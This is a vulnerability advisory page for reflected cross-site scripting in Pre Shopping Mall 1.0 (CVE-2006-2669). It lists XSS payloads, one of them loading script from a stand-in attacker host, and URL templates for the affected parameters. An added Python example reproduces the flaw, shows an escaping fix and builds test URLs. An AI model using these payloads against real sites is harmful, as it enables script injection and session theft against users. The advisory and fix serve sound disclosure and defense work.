Pre Shopping Mall Multiple Cross-Site Scripting (XSS) Vulnerabilities

Vulnerability ID 1194817 Vulnerability type Cross-site scripting
Published 2006-05-30 Updated 2006-06-14
CVE ID CVE-2006-2669 CNNVD ID CNNVD-200605-535
Platform N/A CVSS score 4.3
|Vulnerability source
https://cxsecurity.com/issue/WLB-2006050184
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-535
|Vulnerability details
Pre Shopping Mall 1.0 contains multiple cross-site scripting (XSS) vulnerabilities. A remote attacker can inject arbitrary web script or HTML via (1) the search parameter in search.php (the "search box"), (2) the prodid parameter in detail.php, and (3) the cid parameter in products.php.
|Vulnerability EXP
Pre Shopping Mall

Homepage:

http://www.preprojects.com/emall.asp

Description:

PRE SHOPPING MALL is a powerful ecommerce shopping mall solution. If you need to set up an online shop or shopping mall, PRE SHOPPING MALL is your quickest solution. You can set up your Emall within a few hours. Buy, install and start selling your products. Very easy to install and manage, with powerful administration. Receive payments through either PayPal or Authorize.net. Quickest solution for your online business.

Affected files:

search box (search.php)

detail.php

products.php

Exploits & Vulns:

XSS Vulnerabilities:

The search and login boxes do not sanitize user input before echoing it back into the dynamically generated page. This allows XSS.

For a proof of concept, just try putting this in the search box:

'';!--"<XSS>=&{()}'';!--"<XSS>=&{()}<SCRIPT SRC=http://www.evilcode.com/xss.js></SCRIPT>'';!--"<XSS>=&{()}'';!--"<XSS>=&{()}

More XSS Vulns:

For the XSS examples we'll use URL injection with the tag: <IMG%20SRC=javascript:alert('XSS')>

http://www.example.com/emall/products.php?cid=[XSS]

http://www.example.com/emall/detail.php?prodid=[XSS]
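The pattern behind all three findings, as an added example in Python (this is not code from Pre Shopping Mall, which is PHP, nor from the advisory author): a hypothetical render_vulnerable() that concatenates a request parameter into HTML the way the advisory describes, the hardened render_fixed() that HTML-encodes on output, a reflected_unescaped() check that tells the two responses apart using the advisory's own payloads, and build_test_urls() which fills the [XSS] placeholder for search.php?search, detail.php?prodid and products.php?cid. The function names, the base URL and the constructed responses are assumptions; only the payloads and the script/parameter names come from the page.

```python
"""Reflected XSS as reported for Pre Shopping Mall 1.0, reproduced in Python.

Added example, not the product's own code. The render_* functions are
hypothetical stand-ins for how search.php, detail.php and products.php echo
the 'search', 'prodid' and 'cid' parameters back into the HTML they emit.
"""
from html import escape
from urllib.parse import quote

# Payloads quoted in the advisory above.
POLYGLOT = "'';!--\"<XSS>=&{()}"
IMG_PAYLOAD = "<IMG SRC=javascript:alert('XSS')>"

# (script, parameter) pairs named in the vulnerability details.
AFFECTED = [("search.php", "search"),
            ("detail.php", "prodid"),
            ("products.php", "cid")]


def render_vulnerable(value: str) -> str:
    """Hypothetical reproduction of the bug: the user-controlled value is
    concatenated straight into an attribute and a text node. A '"' in the
    value closes the attribute and any '<tag>' becomes real markup."""
    return (f'<input type="text" name="search" value="{value}">'
            f"<p>Results for {value}</p>")


def render_fixed(value: str) -> str:
    """Hardened form: HTML-encode on output, quotes included, so the value
    cannot leave the attribute or text-node context it was placed in.
    (Encoding is context-specific; this covers HTML text/attribute only.)"""
    safe = escape(value, quote=True)
    return (f'<input type="text" name="search" value="{safe}">'
            f"<p>Results for {safe}</p>")


def reflected_unescaped(body: str, payload: str) -> bool:
    """The check the advisory's PoC relies on: if the payload comes back
    byte-for-byte, its markup characters were not encoded and the browser
    will parse '<XSS>' (or '<IMG ...>') as a tag."""
    return payload in body


def build_test_urls(base: str, payload: str) -> list:
    """Fill the [XSS] placeholder in the advisory's URLs with the URL-encoded
    payload for each affected script/parameter (quote() gives %20 for the
    space, matching the form shown in the advisory)."""
    base = base.rstrip("/")
    return [f"{base}/{script}?{param}={quote(payload, safe='')}"
            for script, param in AFFECTED]


def audit_constructed_responses(payload: str) -> dict:
    """Run the reflection check over constructed responses from the
    vulnerable and the fixed renderer; returns {label: is_vulnerable}."""
    return {
        "vulnerable": reflected_unescaped(render_vulnerable(payload), payload),
        "fixed": reflected_unescaped(render_fixed(payload), payload),
    }


if __name__ == "__main__":
    for url in build_test_urls("http://www.example.com/emall", IMG_PAYLOAD):
        print(url)
    for payload in (POLYGLOT, IMG_PAYLOAD):
        print(payload, audit_constructed_responses(payload))
```

The check is positive only when the raw payload is present in the body; render_fixed() returns `&lt;XSS&gt;` and `&quot;`, so it fails the check while render_vulnerable() passes it. Against a live instance, the same reflected_unescaped() call would be applied to the response for each URL from build_test_urls().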
|References

Source: VUPEN
Name: ADV-2006-1991
Link: http://www.frsirt.com/english/advisories/2006/1991
Source: SECUNIA
Name: 20295
Link: http://secunia.com/advisories/20295
Source: XF
Name: preshoppingmall-multiple-xss(26690)
Link: http://xforce.iss.net/xforce/xfdb/26690
Source: BUGTRAQ
Name: 20060524 Pre Shopping Mall v1.0
Link: http://www.securityfocus.com/archive/1/archive/1/435018/100/0/threaded
Source: OSVDB
Name: 26082
Link: http://www.osvdb.org/26082
Source: OSVDB
Name: 26081
Link: http://www.osvdb.org/26081
Source: OSVDB
Name: 26080
Link: http://www.osvdb.org/26080
Source: BID
Name: 18706
Link: http://www.securityfocus.com/bid/18706
Source: SREASON
Name: 990
Link: http://securityreason.com/securityalert/990